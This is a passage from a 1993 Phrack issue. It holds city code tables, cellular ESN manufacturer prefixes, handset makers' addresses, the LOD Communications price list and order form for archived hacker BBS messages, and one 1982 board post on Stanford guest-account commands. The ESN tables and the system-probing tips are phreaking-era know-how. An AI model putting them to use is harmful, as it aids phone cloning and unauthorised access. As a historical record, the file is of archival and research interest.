College Station, TX     297             280
Colorado Springs, CO    045             180
Columbia, SC            189             182
Columbus, GA            319             302
Columbus, OH            133             138
Corpus Christi, TX      191             184
Council Bluffs, IA      137             152
Cumberland, MD          321             304
Dallas, TX              033             038
Danville, VA            323             306
Davenport, IA           193             186
Dayton, OH              163             134
Daytona Beach, FL       325             308
Decatur, IL             327             532
Denison, TX             033             038
Denver, CO              045             058
Des Moines, IA          195             150
Detroit, MI             021             010
Dothan, AL              329             312
Dubuque, IA             331             314
Duluth, MN              333             316
Durham, NC              069             144
Eau Claire, WI          335             318
Elgin, IL               001             020
El Paso, TX             097             092
Elkhart, IN             549             530
Elmira, NY              283             266
Enid, OK                341             324
Erie, PA                343             326
Eugene, OR              061             328
Evansville, IN          197             190
Fairbanks, AK           ---             1018
Fargo, ND               347             330
Fayetteville, NC        349             100
Fayetteville, AR        607             342
Flint, MI               021             010
Florence, AL            351             334
Florence, SC            377             350
Fort Collins, CO        045             336
Fort Lauderdale, FL     037             024
Fort Myers, FL          355             042
Fort Pierce, FL         037             340
Fort Smith, AR          359             342
Fort Walton Beach, FL   361             344
Fort Wayne, IN          199             080
Fort Worth, TX          033             038
Fresno, CA              153             162
Gainesville, FL         365             348
Gadsden, AL             363             098
Galveston, TX           367             012
Glens Falls, NY         063             078
Grand Forks, ND         371             356
Grand Rapids, MI        021             244
Granite City, IL        017             046
Great Falls, MT         373             358
Greeley, CO             045             360
Green Bay, WI           217             362
Greensboro, NC          095             142
Greenville, SC          139             116
Gulf of Mexico, LA      171             194
Gulfport, MS            ---             264
Guntersville, AL        203             198
Hagerstown, MD          381             364
Hamilton, OH            383             366
Harlingen, TX           451             434
Harrisburg, PA          159             096
Hartford, CT            119             088
Hickory, NC             385             368
Hilo, HI                1161            060
Holbrook, AZ            1027            ---
Honolulu, HI            167             060
Houma, LA               387             370
Houston, TX             035             012
Huntington, WV          307             196
Huntsville, AL          203             198
Indianapolis, IN        019             080
Iowa City, IA           389             286
Jackson, MI             391             374
Jackson, MS             205             160
Jacksonville, FL        075             136
Jacksonville, NC        393             376
Janesville, WI          217             210
Jerseyville, IL         245             586
Johnson City, TN        149             074
Johnstown, PA           039             032
Joliet, IL              001             020
Joplin, MO              401             384
Juneau, AK              ---             1022
Kalamazoo, MI           403             386
Kankakee, IL            001             020
Kansas City, MO         059             052
Kennewick, WA           ---             500
Killeen, TX             409             392
Kingsport, TN           149             074
Knoxville, TN           093             104
Kokomo, IN              411             080
La Crosse, WI           413             396
Lafayette, IN           415             080
Lafayette, LA           431             414
Lake Charles, LA        417             400
Lakeland, FL            175             042
Lancaster, PA           159             096
Lansing, MI             021             188
Laredo, TX              419             402
Las Cruces, NM          097             404
Las Vegas, NV           211             064
Lawrence, KS            059             406
Lawton, OK              425             408
Lewiston, ME            427             482
Lexington, KY           213             206
Lihue, HI               1157            060
Lincoln, NE             433             416
Little Rock, AR         215             208
Longview, TX            229             418
Lorain, OH              437             054
Los Angeles, CA         027             002
Louisville, KY          065             076
Lubbock, TX             439             422
Lynchburg, VA           441             424
Macon, GA               443             426
Madison, WI             217             210
Manchester, NH          445             428
Mansfield, OH           447             430
Marshall, TX            229             418
McAllen, TX             451             434
Medford, OR             061             436
Melbourne, FL           175             068
Memphis, TN             143             062
Miami, FL               037             024
Midland, TX             459             422
Millville, NH           ---             250
Milwaukee, WI           005             044
Minneapolis, MN         023             026
Mobile, AL              081             120
Modesto, CA             233             224
Moline, IL              193             186
Monroe, LA              463             440
Monterey, CA            527             126
Montgomery, AL          465             444
Moorhead, ND            ---             330
Muncie, IN              467             080
Muskegon, MI            021             448
Nashua, NH              445             428
Nashville, TN           179             118
New Bedford, MA         119             028
New Brunswick, NY       173             022
New Haven, CT           119             088
New Orleans, LA         057             036
Newport News, VA        083             168
New York, NY            025             022
Norfolk, VA             083             168
Ocala, FL               473             348
Odessa, TX              475             422
Oklahoma City, OK       169             146
Olympia, WA             047             006
Omaha, NE               137             152
Orange County, NY       479             486
Orlando, FL             175             068
Ottawa, IL              1177            1178
Oxnard, CA              027             002
Panama City, FL         483             462
Parkersburg, WV         485             032
Pascagoula, MS          487             264
Pasco, WA               ---             500
Pensacola, FL           361             120
Peoria, IL              221             214
Petaluma, CA            031             040
Petersburg, VA          071             472
Philadelphia, PA        029             008
Phoenix, AZ             053             048
Pine Bluff, AR          493             208
Pittsburgh, PA          039             032
Pittsfield, MA          119             480
Placerville, CA         ---             1080
Ponce, PR               497             082
Portland, ME            499             482
Portland, OR            061             030
Portsmouth, NH          501             484
Poughkeepsie, NY        503             486
Providence, RI          119             028
Provo, UT               091             488
Pueblo, CO              045             490
Raleigh, NC             069             144
Rapid City, SD          511             494
Reading, PA             103             008
Redding, CA             513             294
Reno, NV                515             498
Richland, WA            517             500
Richmond, VA            071             170
Roanoke, VA             519             502
Rochester, NH           501             484
Rochester, MN           521             504
Rochester, NY           117             154
Rockford, IL            217             506
Sacramento, CA          129             112
Saginaw, MI             021             389
Salem, OR               061             030
Salinas, CA             527             040
Salt Lake City, UT      091             094
San Angelo, TX          529             510
San Antonio, TX         151             122
San Diego, CA           043             004
San Francisco, CA       031             040
San Jose, CA            031             040
San Juan, PR            227             218
Santa Barbara, CA       531             040
Santa Cruz, CA          031             126
Santa Rosa, CA          031             040
Sarasota, FL            175             142
Savannah, GA            539             520
Schenectady, NY         063             078
Scranton, PA            103             172
Seattle, WA             047             006
Sharon, PA              089             126
Sheboygan, WI           543             044
Shreveport, LA          229             220
Sioux City, IA          547             528
Sioux Falls, SD         555             540
South Bend, IA          549             530
Spartanburg, SC         139             116
Spokane, WA             231             222
Springfield, IL         551             532
Springfield, MO         559             546
Springfield, OH         573             134
Springfield, MA         119             188
St. Cloud, MN           553             534
St. Joseph, MO          059             536
St. Louis, MO           017             046
St. Petersburg, FL      175             042
State College, PA       159             032
Steubenville, OH        039             032
Stockton, CA            233             224
Stroudsburg, PA         103             172
Syracuse, NY            077             086
Tacoma, WA              047             006
Tallahassee, FL         565             544
Tampa, FL               175             042
Temple, TX              409             392
Terre Haute, IN         567             080
Texarkana, TX           229             550
Toledo, OH              021             130
Topeka, KS              059             552
Trenton, PA             029             008
Tucson, AZ              053             140
Tulsa, OK               111             166
Tuscaloosa, AL          577             098
Ukiah, CA               1075            ---
Utica, NY               235             226
Vallejo, CA             031             040
Victoria, TX            581             562
Vineland, NJ            583             250
Visalia, CA             153             162
Waco, TX                587             566
Warren, OH              089             126
Washington, DC          013             018
Waterloo, IA            589             568
Wausau, WI              591             570
West Palm Beach, FL     037             024
Wheeling, WV            039             032
Wichita Falls, TX       595             574
Wichita, KS             165             070
Wilkes-Barre, PA        103             172
Williamsport, PA        103             576
Wilmington, DE          123             008
Wilmington, NC          599             578
Winston-Salem, NC       095             142
Worcester, MA           007             028
Yakima, WA              601             580
York, PA                159             096
Youngstown, OH          089             126
Yuba City, CA           129             112


ESN PREFIXES BY MANUFACTURER

Manufacturer                    Decimal   Hex

Alpine Electronics              150       96
AT&T                            158       9E
Audiovox-Audiotel               138       8A
Blaupunkt                       148       94
Clarion Company                 140       8C
Clarion Manufacturing Co.       166       A6
CM Communications               153       99
Di-Bar Electronics              145       91
E.F. Johnson                    131       83
Emptel Electronics              178       B2
Ericsson                        143       8F
Ericsson GE Mobile              157       9D
Fujitsu                         133       85
Gateway Telephone               147       93
General Electric                146       92
Goldstar Products               141       8D
Harris                          137       89
Hitachi                         132       84
Hughes Network Systems          164       A4
Hyundai                         160       A0
Japan Radio Co., Ltd.           152       98
Kokusai                         139       8B
Mansoor Electronics             167       A7
Mobira                          156       9C
Motorola                        130       82
Motorola International          168       A8
Mitsubishi                      134       86
Murata Machinery                144       90
NEC                             135       87
Nokia                           165       A5
Novatel                         142       8E
OKI                             129       81
Panasonic (Matsushita)          136       88
Philips Circuit Assemblies      171       AB
Philips Telecom                 170       AA
Qualcomm                        159       9F
Samsung Corp.                   176       B0
Sanyo                           175       AF
Satellite Technology Services   161       A1
Shintom West                    174       AE
Sony Corp.                      154       9A
Tama Denki Co.                  155       9B
Technophone                     162       A2
Uniden Corp. of America         172       AC
Uniden Corp. of Japan           173       AD
Universal Cellular              149       95
Yupiteru Industries             163       A3


Manufacturers' Addresses

Alpine Electronics of America
191456 Gramercy Place
Torrance, CA 90501
310-326-8000

Antel Corporation
400 Oser Avenue
Hauppauge, NY 11788
516-273-6800

AT&T Consumer Products
5 Woodhollow Drive
Parsippany, NJ 07054
201-581-3000

Audiovox Corp.
150 Marcus Blvd.
Hauppauge, NY 11788
516-231-7750

Blaupunkt
Robert Bosch Corp.
2800 S. 25th Avenue
Broadview, IL 60153
708-865-5200

Clarion Corp. of America
661 W. Redondo Beach Blvd.
Gardena, CA 90247
310-327-9100

DiamondTel
Mitsubishi Electronics of America
800 Biermann Court
Mt. Prospect, IL 60056
708-298-9223

Ericsson
P.O. Box 4248
Lynchburg, VA 24502
800-CAR-FONE

Fujitsu America, Inc.
2801 Telecom Parkway
Richardson, TX 75082
214-690-9660

GE Mobile Communications
P.O. Box 4248
Lynchburg, VA 24502
800-CAR-FONE

GoldStar
1850 W. Drake Drive
Tempe, AZ 85283
602-752-2200

Hughes Network Systems
11717 Exploration Lane
Germantown, MD 20876
301-428-5500

Kenwood USA Corp.
2201 E. Dominguez Street
Long Beach, CA 90810
310-639-9000

Mitsubishi International
1500 Michael Drive, Suite B
Wood Dale, IL 60191
708-860-4200

Motorola, Inc.
1475 W. Shure Drive
Arlington Heights, IL 60004
708-632-5000
800-331-6456

Muratec
5560 Tennyson Parkway
Plano, TX 75024
214-403-3300

NEC America, Inc.
Mobile Radio Division
383 Omni Drive
Richardson, TX 75080
214-907-4000

Nokia Mobile Phones
2300 Tall Pines Drive, Suite 120
Largo, FL 34641
813-536-5553

NovAtel
P.O. Box 1233
Fort Worth, TX 76101
817-847-2100

OKI Telecom
437 Old Peachtree Road
Suwanee, GA 30174
404-995-9800

Omni Cellular
96 S. Madison Street
Carthage, IL 62321
217-357-2308

Panasonic Communications
Two Panasonic Way
Secaucus, NJ 07094
201-348-7000

Panasonic Company
One Panasonic Way
Secaucus, NJ 07096
201-348-9090

Pioneer Electronics
2265 E. 220th Street
Long Beach, CA 90810
310-835-6177

Sanyo
21350 Lassen Street
Chatsworth, CA 91311
800-421-5013
818-998-7200

Shintom West
20435 South Western Avenue
Torrance, CA 90501
310-328-7200

Sony Corp. of America
Sony Drive
Park Ridge, NJ 07656
201-930-1000

Tandy Corp.
700 One Tandy Center
Fort Worth, TX 76102
817-390-3300

Technophone Corp.
1801 Penn Street, Suite 3
Melbourne, FL 32901
407-952-2100

Uniden America Corp.
4700 Amon Carter Blvd.
Fort Worth, TX 71655
817-858-3300

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 18 of 27

The LOD Communications Underground H/P BBS Message Base Project:
Price Listing of Currently Available Message Bases and Order Form.

Holdings List Version #1, 5/15/93

This file contains:

- Background information on the project;
- Currently completed message bases with prices; and,
- Order form and stipulations.

If you have already seen some of the background information contained in the following paragraphs, note that additional information has been added. The aim was to make this file as self-contained as possible. It is approximately seven pages in length (23K) and it should answer all of your questions.

The Project:
------------

Throughout history, physical objects have been preserved for posterity for the benefit of the next generation of humans. Cyberspace, however, isn't very physical; data contained on floppy diskettes has a finite lifetime as does the technology to retrieve that data. The earliest underground hacker bulletin board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s were state-of-the-art. Today, it is difficult to find anyone who has one of these machines in operating condition, not to mention the brain cells left to recall how to operate them. :-(

LOD Communications has created a historical library of the "dark" portion of Cyberspace.
The project's goal is to acquire as much information as possible from underground Hack/Phreak (H/P) bulletin boards that were in operation during a decade long period, dating from the beginnings (in 1980/81 with 8BBS and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. Currently, messages from over 50 different BBSes have been retrieved, although very few message bases are 100% complete. However, not having a complete "set" does not diminish their value.

Who Benefits From This Information?:
------------------------------------

- PARTICIPANTS who were on the various H/P BBSes may want to see their contribution to history or reminisce about the "golden era" of hacking;
- ENTHUSIASTS who came into the "scene" after most of these boards were down may want to see what they missed;
- COMPANIES who may want to see if their (or their competitors') phone systems, computers, or networks were compromised;
- SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what techniques were used to subvert computer security systems;
- SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use the information for research in sociology or computer science as well as for educational purposes in courses such as Computer Law, Computer Ethics, and Computer Security;
- AUTHORS/PRESS who may want to finally get the facts straight about "hackers;" and,
- THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of the Computer Underground, especially those Restricted Access BBSes and their Private sub-boards where only a small handful of "the best" resided.

Were the individuals involved in the Computer Underground out to start World War III, selling secrets to the Soviets, working with organized crime, conspiring to do evil, or just a bunch of bored teenagers with nothing better to do? How much did they know, and how did they find it out?
Did they have the capability to shut down phone service of Area Code portions? Could they ruin someone's credit? Could they "move satellites in the heavens?" Could they monitor packet switching network conversations or YOUR conversations? The answers lie within the messages themselves.

Why is LODCOM Charging Money For The Message Bases?:
----------------------------------------------------

As happens with most projects, the effort and monetary investment turned out to be substantially more than originally anticipated. With all of the high-tech equipment available today, people sometimes forget that in the early 1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the home computer user. Most messages Lodcom has recovered were downloaded at 300 baud onto 143K disk drives, with each file usually no larger than 15K in size. One could not call a BBS and download the complete message base in 10 minutes and save it into one file. Literally hundreds of man-hours have been spent copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy versions when electronic versions were unavailable), organizing over one thousand individual files (thus far) according to what BBS the messages were originally posted on, and splicing the files together. Also, after consulting with the appropriate civil liberties organizations and our own legal counsel, a slight editing of the messages (restricted to long distance access codes, phone numbers, and computer passwords) had to be made to ensure that there is nothing illegal contained within the messages. Every effort was made to keep the messages in their pristine condition: 40 columns, ALL CAPS, spelling errors, offensive language, inaccuracies of various kinds, and ALL.

Although a fairly comprehensive collection of the goings-on during a decade of public and private computer underground activity has been accomplished, there are more messages out there.
It is our wish to continue to document the History of the Computer Underground. In order to do this, and in order to break even on what resources have already been expended (it is a LOT more than most people realize), a dollar value has been attached to each set of message bases. The dollar values were kept as low as possible and range from $1.00 to $8.00 for each H/P BBS Message Base Set. Without your understanding and support, this effort may not be able to sustain itself long enough to complete the project. A large portion of any profits will be recycled for two other projects in the works, whose aim is to provide additional historical background on the Computer Underground Community. That is, no one involved is quitting their day job :-)

One additional note: For those who purchase the Metal Shop Private Message Base, 100% of the price ($4.00) will be donated to help pay for Craig Neidorf's (Knight Lightning) Legal Defense bills (due to his successful campaign to protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911 case).

How The Prices Were Determined:
-------------------------------

Prices were determined based on the following considerations:

- The number of years ago that the BBS operated (affected availability);
- The total number of messages compiled (required more time to compile);
- Its popularity and message content (anticipated demand);
- Whether the BBS or portions thereof were deemed "elite" and, therefore, restricted access to a small number of users (affected availability); and,
- An additional factor to account for overhead costs such as diskettes, diskette mailing containers, postage, time to fill orders, etc.

What Each "Message Base File" Contains:
---------------------------------------

- A two page general message explaining H/P BBS terminology and format.
- The BBS Pro-Phile: A historical background and description of the BBS either written by the original system operator(s) or those who actually called the BBS when it was in operation (it took months to track the appropriate people down and get them to write these specifically for this project; lesser known BBSes may not contain a Pro-Phile);
- Messages posted to the BBS (i.e. the Message Base);
- Downloaded Userlists if available; and
- Hacking tutorials a.k.a. "G-Philes" that were on-line if available.

It is anticipated that most people who are interested in the message bases have never heard of a lot of the BBS names shown in the listing. If you have seen one set of messages, you have NOT seen them ALL. Each system had a unique personality, set of users, and each has something different to offer. If you decide to order the minimum, we recommend that you mix a high-priced base ($7.00 or above) with a couple of medium-priced bases ($4.00 to $6.00) and a few lower-priced bases ($1.00 to $3.00). This will provide you with a feel for what was happening over a broad range of years and message quality. Of course, nothing beats the full set (offered at a discount, see order form).

Formats the Message Base Files are Available in:
------------------------------------------------

Due to the large size of the Message Base Files, they will be compressed using the format of your choice. Please note that Lodcom does NOT include the compression/decompression program (PKZIP, PAK, etc.). ASCII (decompressed) files will be provided for $2.00 extra to cover additional diskette and shipping costs. The files are available for:

- IBM (5.25 or 3.5 inch)
- AMIGA (3.5 inch)
- APPLE MACINTOSH (3.5 inch)
- PAPER versions can be ordered but cost triple (due to increased shipping costs, time to print order, and messages being in 40 column format and therefore wasting lots of paper...save those trees!). Paper versions take twice the time to deliver but are laser printed.

Orders are expected to arrive at the requesters' physical mail box in 2-4 weeks upon receipt of the order.

FAQs (Frequently Asked Questions):
----------------------------------

QUESTION: How long will these Message Base Files be available?

ANSWER: We cannot say for sure. This is an ongoing effort and your support will allow us to continue until we are satisfied with having recovered the last decent scraps of messages out there. Assuming there is a demand for these messages, all H/P BBSes of WORTH (i.e. NON-"codez" and NON-"warez" systems) are expected to be offered by the end of the Summer of 1993. A Guesstimate of what will be offered is 80 to 100 Message Bases, half of which will be rather partial. Orders are expected to be filled up until the end of 1993 although this may change. Regardless, we will send out notification well in advance of ceasing operations.

QUESTION: "Can I help out? I have some old messages" (either on a C64, Apple, IBM [best for us], or printout).

ANSWER: Contact us ASAP! We will work out an equitable agreement depending on the quantity, quality, format, and "ancientness" of the messages. Your contribution will not go unrecognized.

QUESTION: Say I purchase BBS "X" which has 100 messages and the next Version of your Price Listing shows BBS "X" now has 200 messages, do I have to pay for the first 100 all over again if I want the other 100 messages?

ANSWER: No. If a small number of additional messages are added, they will be sent for the price of a diskette and postage only, i.e. the information will be free. If a larger number such as 100 new messages are added, then if you previously purchased the message base, the additional messages will be discounted. Those who pay the Commercial Rate (corporations, government, etc.) will receive updates of the purchased Volume for FREE regardless of how many new messages there are, and LODCOM also pays for the postage and diskette(s).

QUESTION: What if I purchase the minimum order now and, when the next Version of the price list is released, I want to get more Message Bases? Do I have to still pay the $20.00 minimum?

ANSWER: No. If you are a previous customer, the minimum is cut in half, that is, $10.00. Commercial customers who bought Volume #1 (the current "Complete Set"), are obviously not obligated to purchase the added Message Bases (the next Volume).

QUESTION: I would really like to get a feel for what one or two of the boards were like before I order them. Can I get more info?

ANSWER: Yes. A Sample of Actual Messages is available by performing the following, so long as you have TELNET access to the Internet:

    Telnet to: 198.67.3.2       [IP Address for PHANTOM.COM]
    Type:      mindvox          [To enter the Mindvox system]
    login as:  guest            [To look around]
    At prompt: finger lodcom    [To see our Sample Messages File]

If you do not have TELNET access to the Internet, AND your host will NOT "bounce" a 50K file, Lodcom will send you the Sample Messages File if you specifically request it.

The Price List:
---------------

LOD Communications (c) 1993: Price List of Hack/Phreak BBS Message Bases
----------------------------------------------------------------------------
BBS NAME            A/C  SYSOP(S)           # MSGS  DATES       KBYTES PRICE
----------------------------------------------------------------------------
Alliance BBS        618  Phantom Phreaker   113     2/09/86 -   215    $ 3.00 B
                         Doom Prophet       G,P     6/30/86

Black Ice Private   703  The Highwayman     880     12/1/88 -   580    $ 7.00 B
                                            P,U     5/13/89

Broadway Show/      718  Broadway Hacker    180     9/29/85 -   99     $ 3.00 B
Radio Station BBS                                   12/27/85

CIA BBS             201  CIA Director       30      5/02/84 -   30     $ 1.00
                                                    6/08/84

C.O.P.S.            305  Mr. Byte-Zap       227     11/5/83 -   196    $ 4.00 B
                         The Mechanic       G,R,U   7/16/84

Face To Face        713  Montressor         572     11/26/90 -  400    $ 2.00 B
                         Doc Holiday *              12/26/90

Farmers Of Doom     303  Mark Tabas         41      2/20/85 -   124    $ 2.00 B
                                            G       3/01/85

Forgotten Realm     618  Crimson Death      166     3/08/88 -   163    $ 3.00 B
                                                    4/24/88

Legion Of Doom!     305  Lex Luthor         194     3/19/84 -   283    $ 6.00 B
                         Paul Muad'Dib *    G,P,U   11/24/84

Metal Shop Private  314  Taran King         520     4/03/86 -   380    $ 4.00 BD
                         Knight Lightning   P,R,U   5/06/87

OSUNY               914  Tom Tone           375     7/9/82 -    368    $ 8.00 B
                         Milo Phonbil *     G,U     4/9/83

Phoenix Project     512  The Mentor         1118    7/13/88 -   590    $ 4.00 B
                         Erik Bloodaxe *    G,R     2/07/90

Plover-NET          516  Quasi Moto         346     1/14/84 -   311    $ 5.00 B
                         Lex Luthor *       G       5/04/84

Safehouse           612  Apple Bandit       269     9/15/83 -   251    $ 4.00 B
                                            G,U     5/17/84

Sherwood Forest I   212  Magnetic Surfer    92      5/01/84 -   85     $ 2.00 B
                                            P,U     5/30/84

Sherwood Forest ][  914  Creative Cracker   100     4/06/84 -   239    $ 3.00 B
                         Bioc Agent 003 *   G       7/02/84

Split Infinity      408  Blue Adept         52      12/21/83 -  36     $ 1.00 B
                                                    1/21/84

Twilight Phone      ???  System Lord        17      9/21/82 -   24     $ 1.00
                                                    1/09/83

Twilight Zone/      203  The Marauder       108     2/06/85 -   186    $ 3.00 B
Septic Tank              Safe Cracker *     G,U     7/24/86

WOPR                617  Terminal Man       307     5/15/84 -   266    $ 6.00 B
                         The Minute Man *   G,U     1/12/85
_____________________________________________________________________________

NOTES: In SYSOP(S) column, * indicates remote sysop.

In #msgs column, P indicates that the BBS was Private, R indicates BBS was public but restricted access sub-board(s) are included, G indicates that SOME (or maybe all) of the G-files written by the sysop and/or files that were available on the BBS are included, U indicates that a BBS Userlist (typically undated) is included.

DATES column shows the starting and ending dates for which messages were buffered (and therefore available) although there may be some gaps in the chronological order.

KBYTES column shows size of complete file containing messages, g-files, userlist, etc.

COST column indicates current cost of message base in U.S. Dollars, "B" indicates that a "BBS Pro-Phile" was written and is included, "D" indicates that 100% of all orders for that BBS (Metal Shop Private) will be donated to help pay for Craig Neidorf's (Knight Lightning) Legal Defense bills.

LODCOM is currently organizing and splicing messages from over 30 more H/P BBSes [shown below] and, as the files are completed and/or as additional messages are procured for the above systems, updates of this listing will be released. Next release is expected some time in JUNE of 1993:

Modem Over Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop: BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop: The Egyptian Lover, Blottoland (216) sysop: King Blotto, Osuny 2 (a.k.a. The Crystal Palace) (914), The Hearing Aid, Split Infinity (408), (303) sysop: The ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth, Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617) sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam (314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace, Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB, Planet Earth (714), PBS (702), Lost City of Atlantis sysop: The Lineman, and more.

Hacking/Phreaking Tutorials a.k.a. "G-Philes":
----------------------------------------------

Along with the above H/P BBS Message Bases, LODCOM has collected many of the old "philes" that were written and disseminated over the years. A list of all of them would take up too much space here, however, we can tell you that the majority are NOT files that were originally written for electronic newsletters such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the LOD/H Technical Journal). Those files/newsletters are readily available from other sources.
This hodgepodge of files includes files from Bioc Agent 003, Legion of Doom members, and many others that somehow fell out of widespread circulation. A Table of Contents of the collection is included but the tutorials are all grouped together in four large files of approximately 250K each. This collection will have additions with each update of this file. See the order form for the price (price will go up as more files are added).

The Order Form:
---------------

- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -

LOD Communications H/P BBS Message Base ORDER FORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PERSONAL RATE: Due to the economics involved in diskettes, disk mailing containers, snail mail costs, and time to fill orders, a MINIMUM ORDER of $20.00 is required for all personal requests. If all 20 message bases are ordered (containing 5700+ messages), the cost is discounted to $39.00; if you order $20.00 worth (the minimum) or more, you get $5.00 worth in addition as a discount. That is, pay for $20.00 and get $25.00 worth of message bases.

COMMERCIAL RATE: Corporations, Universities, Libraries, and Government Agencies must order the complete set (Volume #1) and pay a higher rate. For Price Listing Version #1 Released 5/15/93 (20 boards total), the price is $99.00 (note that new messages that surface for any BBS purchased will be sent completely FREE of ANY additional charge).

H/P BBS Names:    ____________________________________________________________
[Write: COMPLETE  ____________________________________________________________
SET if you want
all messages]     ____________________________________________________________

"G-Phile" Collection Version #1 (Optional): $____________ ($10.00 Personal)
                                                          ($25.00 Commercial)

Disk Format/Type of Computer: _____________________________________
(Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)

File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
                    (ASCII [Non-Compressed] add $2.00 to order)

Texas Residents add 8% Sales Tax.
If outside North America please add $5.00 for Shipping & Handling.

Total Amount (In U.S. Dollars): $ ___________

Payment Method: Check or Money Order please.
Absolutely NO Credit Cards, even if it's yours :-)

By purchasing these works, the Purchaser agrees to abide by all applicable U.S. Copyright Laws to not distribute or reproduce, electronically or otherwise, in part or in whole, any part of the Work(s) without express written permission from LOD Communications.

Send To:
          Name: _____________________________________

  Organization: _____________________________________ (If applicable)

        Street: _____________________________________

City/State/Zip: _____________________________________

       Country: _____________________________________

E-mail address: _____________________________________ (If applicable)

PRIVACY NOTICE: The information provided to LOD Communications is used for sending orders and periodic updates to the H/P BBS Message Base Price List. It will NOT be given or sold to any other party. Period.

- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -

Remit To:   LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA 78701

Lodcom can also be contacted via E-mail: lodcom@mindvox.phantom.com
                             Voice Mail: 512-448-5098
_____________________________________________________________________________
End Order File V.1

LOD Communications: Leaders in Engineering, Social and Otherwise ;)

Email: lodcom@mindvox.phantom.com
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA 78701

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 19 of 27

Lodcom Sample Messages Set #1, 4/20/93

In order to provide a better feeling for the content of what the LOD Communications Underground Hack/Phreak BBS Message Base Archives contain, 31 messages were selected from the overall collection of posts for 5 Boards. Note that the samples contained herein are fairly typical and are but a very small fraction of the 5000+ messages from over 50 systems that LODCOM currently possesses. Additional BBS's and messages are being added constantly. Consult the Price Listing [First Version due to be released in Late April 1993 and periodic additions thereafter] for an up-to-date catalog of our holdings and costs (minimal).

The selection of messages in Set #1 are from the following Systems:

H/P BBS Name        A/C  Sysop(s)                        Circa
-----------------------------------------------------------------------------
OSUNY               914  Tom Tone & Milo Phonbil         1982/83
WOPR                617  Terminal Man & The Minute Man   1984/85
Phoenix Project     512  The Mentor & Erik Bloodaxe      1988/89/90
The Twilight Zone   203  The Marauder & SafeCracker      1985/86
Black Ice Private   703  The HighwayMan & The Mentor     1988/89
_____________________________________________________________________________

H/P BBS Message Bases to be available in the near future (in addition to the above five) are: 8BBS (213) Circa 1980/81, Modem Over Manhattan (MOM), Twilight Phone (1982), Legion of Doom!
(305) sysop: Lex Luthor, Plover-NET (516) sysop: Quasi Moto, Sherwood Forest II (914) co-sysop: Bioc Agent 003, Alliance BBS (618) sysop: Phantom Phreaker, Catch-22 (617) sysop: Silver Spy, Blottoland (216) sysop: King Blotto, Osuny 2 (aka The Crystal Palace) (914), Mines of Moria (713), Pirates Cove (516) sysop: BlackBeard, The Hearing Aid, Split Infinity (408), Farmers of Doom! (303) sysop: Mark Tabas, Shadowland (303) sysop: The ShadowMaster, Metal Shop Private (314) sysops: Taran King and Knight Lightning, ShadowSpawn (219) sysop: Psychic Warlord, IROC, FreeWorld II (301), Planet Earth (714), The C.O.P.S. (305), Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach Underground, Stronghold East Elite (516) cosysop: Slave Driver, Pure Nihilism, 5th Amendment (713), Newsweek Elite (617), Phreak Klass 2600 (806), Lunatic Labs (415), Laser Beam (314), Hackers Den, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace, Digital Logic (305), Asgard (201), The CIA bbs, The KGB bbs, Face to Face (1990), Broadway Show (718) Sysop: Broadway Hacker, The Safehouse (612) circa 1983/4, Lost City of Atlantis (215), The Private Sector (2600 sponsor BBS), and more.

This message constitutes explicit Permission by LOD Communications to disseminate this File containing 31 actual messages from our Copyrighted (c) 1993 collection of H/P BBS Message Bases so long as the contents are not modified. No part of this File may be published in print without explicit permission by Lodcom.

Lodcom Sample H/P BBS Messages:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** {OSUNY (914) Sysop(s): Tom Tone and Milo Phonbil (both wrote for TAP)} ***
*** {Osuny is perhaps the most legendary Phreak Board of all time} ***

Msg.:118
Date:10/5/82
From:MILO PHONBIL
To:ALL
About:STANFORD STUFF

Greetings, Stanford phreaks!
It seems that those "strange" numbers are really ones that will appear if another person is signed on to the same id. (Like AA.TEG AA.TEG#2 AA.TEG#3 and so on.) Also, while there is no MAIL facility available to "GUEST" accounts, there is a way to send a one-liner to someone else. The command format is:

TO gg.uuu msg

Where gg.uuu is the person's id, and the msg is of course, the message.

Also, their SPIRES database is quite interesting! Type CALL SPIRES, then SHOW SUBFILES. Then you must SELECT a subfile. For a complete tutorial, try:

TUTORIAL MASTERLIST

SPIRES is ended by typing EXIT at the -> prompt.

Later,
MILO PHONBIL

Msg. :180
About :MAINFRAMES
From :DATA BANDIT
To :ALL PHREAKS
Date :2/23/83 00:00

